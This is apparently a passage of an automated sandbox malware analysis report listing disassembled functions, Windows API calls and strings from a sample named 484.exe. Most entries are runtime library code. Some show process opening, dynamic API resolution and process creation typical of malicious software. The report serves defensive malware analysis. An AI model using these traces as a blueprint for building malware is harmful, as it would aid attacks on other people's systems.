Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD

InterlockedDecrement.KERNEL32(?), ref: 00421CD9

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

InterlockedIncrement.KERNEL32(00432C08), ref: 00421D04

Strings

'C, xrefs: 00421CE3

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 004212CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 40

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00435780,00000008,004213D5,00000000,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000), ref: 004212DE

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD

InterlockedIncrement.KERNEL32(?), ref: 0042131F

Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(00000000), ref: 00422191
Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 0042219E
Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221AB
Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221B8
Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221C5
Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221E1
Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 004221F1
Part of subcall function 0042217F: InterlockedIncrement.KERNEL32(?), ref: 00422207

Strings

'C, xrefs: 00421309
p.C, xrefs: 00421346
KERNEL32.DLL, xrefs: 004212D9

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00425296, Relevance: 7.7, APIs: 5, Instructions: 190

APIs

__alloca_probe_16.NTDLLP ref: 00425332
__alloca_probe_16.NTDLLP ref: 004253EC

Part of subcall function 0042BB4E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0042BB93

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000100,00000000,?,?,?,?), ref: 0042544F
__freea.LIBCMT ref: 00425459
__freea.LIBCMT ref: 00425462

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0042C5C5, Relevance: 7.7, APIs: 5, Instructions: 179

APIs

__getptd.LIBCMT ref: 0042C5DD

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

_LcidFromHexString.LIBCMT ref: 0042C5EA
_strlen.LIBCMT ref: 0042C69D
_strlen.LIBCMT ref: 0042C731
_TestDefaultLanguage.LIBCMT ref: 0042C760

Part of subcall function 0042C56A: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 0042C58B
Part of subcall function 0042C56A: _GetPrimaryLen.LIBCMT ref: 0042C5AC
Part of subcall function 0042C56A: _strlen.LIBCMT ref: 0042C5B4

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00427503, Relevance: 7.7, APIs: 5, Instructions: 171

APIs

__expandlocale.LIBCMT ref: 004276A8

Part of subcall function 00426FA8: __getptd.LIBCMT ref: 00426FDE
Part of subcall function 00426FA8: _strlen.LIBCMT ref: 00427084

Part of subcall function 00427503: __getptd.LIBCMT ref: 004271F1
Part of subcall function 00427503: __expandlocale.LIBCMT ref: 00427219
Part of subcall function 00427503: _strlen.LIBCMT ref: 0042725B
Part of subcall function 00427503: ___crtGetStringTypeA.LIBCMT ref: 004273E1
Part of subcall function 00427503: _memcmp.LIBCMT ref: 00427414
Part of subcall function 00427503: InterlockedDecrement.KERNEL32 ref: 004274B7
Part of subcall function 00427503: _strpbrk.LIBCMT ref: 00427584
Part of subcall function 00427503: _strncmp.LIBCMT ref: 004275C7
Part of subcall function 00427503: _strlen.LIBCMT ref: 004275D5
Part of subcall function 00427503: _strcspn.LIBCMT ref: 004275FB

Part of subcall function 00426E43: InterlockedDecrement.KERNEL32(?), ref: 00426F0F
Part of subcall function 00426E43: InterlockedDecrement.KERNEL32(?), ref: 00426F26
Part of subcall function 00426E43: InterlockedDecrement.KERNEL32(00000000), ref: 00426F6F
Part of subcall function 00426E43: InterlockedDecrement.KERNEL32(00000000), ref: 00426F86

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0040849D, Relevance: 7.6, APIs: 6, Instructions: 131

APIs

Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0040752D
Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 00407530
Part of subcall function 004074D8: GetMessageTime.USER32 ref: 00407544
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040759E
Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 004075A1
Part of subcall function 004074D8: IsSystemResumeAutomatic.KERNEL32 ref: 004075B5
Part of subcall function 004074D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 004075E6
Part of subcall function 004074D8: GetProcAddress.KERNEL32(00000000), ref: 004075ED
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407601
Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 0040760A
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0040760F
Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 00407612
Part of subcall function 004074D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0040762E
Part of subcall function 004074D8: CloseHandle.KERNEL32(00000000), ref: 0040764D

Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000002), ref: 00407C57
Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407C5A
Part of subcall function 00407C11: GetShellWindow.USER32 ref: 00407C6F
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00407CF0
Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407CF3
Part of subcall function 00407C11: GetProcessWindowStation.USER32 ref: 00407D08
Part of subcall function 00407C11: GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00407D47
Part of subcall function 00407C11: GetProcAddress.KERNEL32(00000000,00000000,?,00000002), ref: 00407D70
Part of subcall function 00407C11: GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00407D86
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00407DED
Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407DF0
Part of subcall function 00407C11: GetProcessWindowStation.USER32 ref: 00407E02
Part of subcall function 00407C11: GetProcAddress.KERNEL32(00000000,?,00000002), ref: 00407E31
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00407E3F
Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 00407E42
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,00000200,?,00000002), ref: 00407E89
Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407E8C
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000008,00000100,?,00000002), ref: 00407EA4
Part of subcall function 00407C11: HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407EA7
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,76E6FE8D,?,00000002), ref: 00408065
Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 0040806C
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 0040807F
Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 00408082
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 004080B5
Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 004080BE
Part of subcall function 00407C11: GetProcessHeap.KERNEL32(00000000,?,?,00000002), ref: 004080C3
Part of subcall function 00407C11: HeapFree.KERNEL32(00000000,?,00000002), ref: 004080C6

VirtualAlloc.KERNEL32(00000000,76E6FE8D,00003000,00000004,00000000,00000008,76E6FE8D,?,004081EC,00000000,00000008,76E6FE8D), ref: 004084DD
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 00408518
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 00408528
lstrcmpiA.KERNEL32(?,?), ref: 00408562
lstrcmpiA.KERNEL32(?,?), ref: 00408585
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 004085D1

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00420656, Relevance: 7.6, APIs: 5, Instructions: 98

APIs

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD

DecodePointer.KERNEL32(00435760,00000020,004207BD,00000000,00000001,00000000,?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206A0
DecodePointer.KERNEL32(?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206B1

Part of subcall function 0042120D: EncodePointer.KERNEL32(00000000,00424877,00435AB0,00000314,00000000,?,?,?,?,?,00420961,00435AB0,Microsoft Visual C++ Runtime Library,00012010), ref: 0042120F

DecodePointer.KERNEL32(-00000004,?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206D7
DecodePointer.KERNEL32(?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206EA
DecodePointer.KERNEL32(?,004207FD,000000FF,?,00423EDA,00000011,00000000,?,00421317,0000000D), ref: 004206F4

Part of subcall function 00423DC2: LeaveCriticalSection.KERNEL32(?,00423EB1,0000000A,00423EA1,00435890,0000000C,00423ECE,00000000,00000000,?,00421317,0000000D), ref: 00423DD1

Part of subcall function 004204C1: ExitProcess.KERNEL32 ref: 004204D2

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0040CF97, Relevance: 7.6, APIs: 5, Instructions: 74

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040CFBF
ReadFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 0040CFE2
ReadFile.KERNEL32(00000000,?,00000200,?,?), ref: 0040D035
CloseHandle.KERNEL32(00000000), ref: 0040D043

Part of subcall function 0040D9F1: CreateFileW.KERNEL32(001CFDA8,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040DA1F
Part of subcall function 0040D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA2E
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA47
Part of subcall function 0040D9F1: HeapAlloc.KERNEL32(00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA4E
Part of subcall function 0040D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DA63
Part of subcall function 0040D9F1: GetLastError.KERNEL32(?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA8B
Part of subcall function 0040D9F1: CloseHandle.KERNEL32(00000000), ref: 0040DA99
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAB0
Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DAB7
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAC3
Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DACA

Sleep.KERNEL32(000003E8,?,00000000), ref: 0040D064

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00404D73, Relevance: 7.6, APIs: 5, Instructions: 74

APIs

OpenProcess.KERNEL32(0000043A,00000000,?), ref: 00404D9C
GetCurrentProcess.KERNEL32 ref: 00404DE5

Part of subcall function 00404C1F: GetProcessHeap.KERNEL32(00000008,00000010), ref: 00404C65
Part of subcall function 00404C1F: HeapAlloc.KERNEL32(00000000), ref: 00404C68
Part of subcall function 00404C1F: GetMessageTime.USER32 ref: 00404C7D
Part of subcall function 00404C1F: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00404CD4
Part of subcall function 00404C1F: HeapAlloc.KERNEL32(00000000), ref: 00404CD7
Part of subcall function 00404C1F: IsSystemResumeAutomatic.KERNEL32 ref: 00404CEB
Part of subcall function 00404C1F: GetModuleHandleA.KERNEL32(00000000,?), ref: 00404D1C
Part of subcall function 00404C1F: GetProcAddress.KERNEL32(00000000), ref: 00404D23
Part of subcall function 00404C1F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404D4F
Part of subcall function 00404C1F: HeapFree.KERNEL32(00000000), ref: 00404D5C
Part of subcall function 00404C1F: GetProcessHeap.KERNEL32(00000000,?), ref: 00404D61
Part of subcall function 00404C1F: HeapFree.KERNEL32(00000000), ref: 00404D68

Part of subcall function 00409240: GetVersion.KERNEL32(?,00000000,00000000), ref: 00409263
Part of subcall function 00409240: CloseHandle.KERNEL32(00000000), ref: 004093F9

Sleep.KERNEL32(00000032), ref: 00404E22
CloseHandle.KERNEL32(?), ref: 00404E38
CloseHandle.KERNEL32(?), ref: 00404E3E

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00424717, Relevance: 7.6, APIs: 5, Instructions: 74

APIs

DecodePointer.KERNEL32(?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 0042472C
DecodePointer.KERNEL32(?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 00424739

Part of subcall function 0042BADC: HeapSize.KERNEL32(00000000,00000000,?,00424757,00000000,?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?), ref: 0042BB07

Part of subcall function 00424CD1: Sleep.KERNEL32(00000000,00000000,00000000,?,00424791,00000000,00000010,?,?,?,?,?,0042481B,?,00435910,0000000C), ref: 00424CFB

EncodePointer.KERNEL32(00000000,?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 0042479E
EncodePointer.KERNEL32(?,?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 004247B2
EncodePointer.KERNEL32(-00000004,?,?,?,?,?,0042481B,?,00435910,0000000C,00424847,?,?,0042060C,004211E7), ref: 004247BA

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042198F, Relevance: 7.6, APIs: 5, Instructions: 54

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004219C6
GetCurrentProcessId.KERNEL32 ref: 004219D2
GetCurrentThreadId.KERNEL32 ref: 004219DA
GetTickCount.KERNEL32 ref: 004219E2
QueryPerformanceCounter.KERNEL32(?), ref: 004219EE

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042198F, Relevance: 7.6, APIs: 5, Instructions: 54

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004219C6
GetCurrentProcessId.KERNEL32 ref: 004219D2
GetCurrentThreadId.KERNEL32 ref: 004219DA
GetTickCount.KERNEL32 ref: 004219E2
QueryPerformanceCounter.KERNEL32(?), ref: 004219EE

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00420E23, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\LUKETA~1\AppData\Local\Temp\484.exe,00000104), ref: 00420E43
_wparse_cmdline.LIBCMT ref: 00420E6D

Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE,00000000,00000000,?,00421317,0000000D), ref: 00424C61

_wparse_cmdline.LIBCMT ref: 00420EAF

Strings

C:\Users\LUKETA~1\AppData\Local\Temp\484.exe, xrefs: 00420E32, 00420E37

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00420E23, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\LUKETA~1\AppData\Local\Temp\484.exe,00000104), ref: 00420E43
_wparse_cmdline.LIBCMT ref: 00420E6D

Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,?,?,00423E3E,00000018,00435890,0000000C,00423ECE,?,?,?,00421317,0000000D,?,0042085F), ref: 00424C61

_wparse_cmdline.LIBCMT ref: 00420EAF

Strings

C:\Users\LUKETA~1\AppData\Local\Temp\484.exe, xrefs: 00420E32, 00420E37

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00406C0B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50

APIs

wsprintfW.USER32 ref: 00406C4D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00406C6B
CloseHandle.KERNEL32(00000000), ref: 00406C7A

Strings

%s --, xrefs: 00406C47

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004212CD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40

APIs

GetModuleHandleW.KERNEL32(00434124,00435780,00000008,004213D5,00000000,00000000,?,0042085F,00000003), ref: 004212DE

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD

InterlockedIncrement.KERNEL32(004327E0), ref: 0042131F

Strings

'C, xrefs: 00421309
p.C, xrefs: 00421346

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00420496, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16

APIs

GetModuleHandleW.KERNEL32(mscoree.dll,?,004204CE,00000000,?,0042BB7D,000000FF,0000001E,00000001,00000000,00000000,?,00424C51,00000000,00000001,00000000), ref: 004204A0
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,004204CE,00000000,?,0042BB7D,000000FF,0000001E,00000001,00000000,00000000,?,00424C51,00000000,00000001), ref: 004204B0

Strings

mscoree.dll, xrefs: 0042049B
CorExitProcess, xrefs: 004204AA

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0040E545, Relevance: 6.3, APIs: 5, Instructions: 81

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0040E667), ref: 0040E55F
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0040E667), ref: 0040E58D
HeapAlloc.KERNEL32(00000000,?,0040E667), ref: 0040E594
GetProcessHeap.KERNEL32(00000000,00000000,?,0040E667), ref: 0040E5E9
HeapFree.KERNEL32(00000000,?,0040E667), ref: 0040E5F0

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00421DA0, Relevance: 6.2, APIs: 4, Instructions: 159

APIs

Part of subcall function 00421D24: GetOEMCP.KERNEL32 ref: 00421D4D
Part of subcall function 00421D24: GetACP.KERNEL32 ref: 00421D70

IsValidCodePage.KERNEL32(-00000030), ref: 00421E13
GetCPInfo.KERNEL32(00000000,?), ref: 00421E26
setSBUpLow.LIBCMT ref: 00421F14

Part of subcall function 00421AF0: GetCPInfo.KERNEL32(?,?), ref: 00421B11
Part of subcall function 00421AF0: ___crtGetStringTypeA.LIBCMT ref: 00421B8E
Part of subcall function 00421AF0: ___crtLCMapStringA.LIBCMT ref: 00421BAE
Part of subcall function 00421AF0: ___crtLCMapStringA.LIBCMT ref: 00421BD3

setSBCS.LIBCMT ref: 00421DCD

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00426E43, Relevance: 6.1, APIs: 4, Instructions: 133

APIs

Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE,00000000,00000000,?,00421317,0000000D), ref: 00424C61

InterlockedDecrement.KERNEL32(?), ref: 00426F0F
InterlockedDecrement.KERNEL32(?), ref: 00426F26

Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3

InterlockedDecrement.KERNEL32(00000000), ref: 00426F6F
InterlockedDecrement.KERNEL32(00000000), ref: 00426F86

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

